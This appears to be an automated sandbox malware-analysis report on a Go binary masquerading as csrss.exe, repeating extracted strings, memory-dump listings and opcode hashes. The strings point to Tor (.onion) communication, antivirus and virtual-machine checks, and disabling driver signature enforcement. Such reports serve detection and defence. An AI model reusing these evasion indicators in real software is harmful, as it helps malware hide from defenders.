                                                                                                                            • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                            • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                            • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.551547677.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551800519.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551813836.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551871924.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551888084.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551901407.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 0000000E.00000002.551911673.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                            • API String ID: 0-626581767
                                                                                                                            • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                            • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Analysis Process: csrss.exe PID: 1240 Parent PID: 3352 csrss.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                            • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                            • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                            • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                            • ", xrefs: 00428CF9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.362002690.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.362325353.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363581790.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363596992.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363670990.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363681931.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363689828.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363701078.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                            • API String ID: 0-2405844374
                                                                                                                            • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                            • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                            • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                            • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                            • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.362002690.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.362325353.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363581790.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363596992.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363670990.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363681931.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363689828.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000010.00000002.363701078.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                            • API String ID: 0-626581767
                                                                                                                            • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                            • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Analysis Process: csrss.exe PID: 7108 Parent PID: 664 csrss.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                            • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                            • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                            • ", xrefs: 00428CF9
                                                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392119776.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392497131.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392506023.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392537937.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392544848.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392550911.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392557487.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                            • API String ID: 0-2405844374
                                                                                                                            • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                            • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                            • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                            • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                            • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392119776.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392497131.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392506023.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392537937.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392544848.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392550911.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000017.00000002.392557487.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                            • API String ID: 0-626581767
                                                                                                                            • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                            • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Analysis Process: csrss.exe PID: 3016 Parent PID: 3352 csrss.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                            • ", xrefs: 00428CF9
                                                                                                                            • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                            • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                            • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.377614000.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.381472551.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.382758872.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.382781961.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.383135982.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.383161482.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.383171406.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.383188971.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                            • API String ID: 0-2405844374
                                                                                                                            • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                            • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                            • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                            • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                            • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                            • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.377614000.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.381472551.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.382758872.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.382781961.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.383135982.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.383161482.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.383171406.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                            • Associated: 00000022.00000002.383188971.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                            • API String ID: 0-626581767
                                                                                                                            • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                            • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                            • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%